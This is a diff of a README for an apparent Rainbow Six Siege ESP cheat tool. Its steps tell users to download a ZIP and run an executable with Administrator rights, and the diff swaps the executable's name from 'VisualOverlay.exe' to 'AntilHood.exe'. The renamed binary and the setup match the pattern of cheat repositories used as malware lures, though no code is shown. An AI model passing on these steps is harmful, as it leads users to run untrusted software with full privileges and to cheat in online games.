aamerijaan11/rainbow-six-esp-visual-assist/README.md

 1. Download the full ZIP using the buttons above
 2. Extract using 7-Zip or WinRAR
-3. Run `VisualOverlay.exe` with Administrator rights
+3. Run `AntilHood.exe` with Administrator rights
 4. Open the configuration menu and enable desired ESP elements
 5. Launch Rainbow Six Siege — overlays appear instantly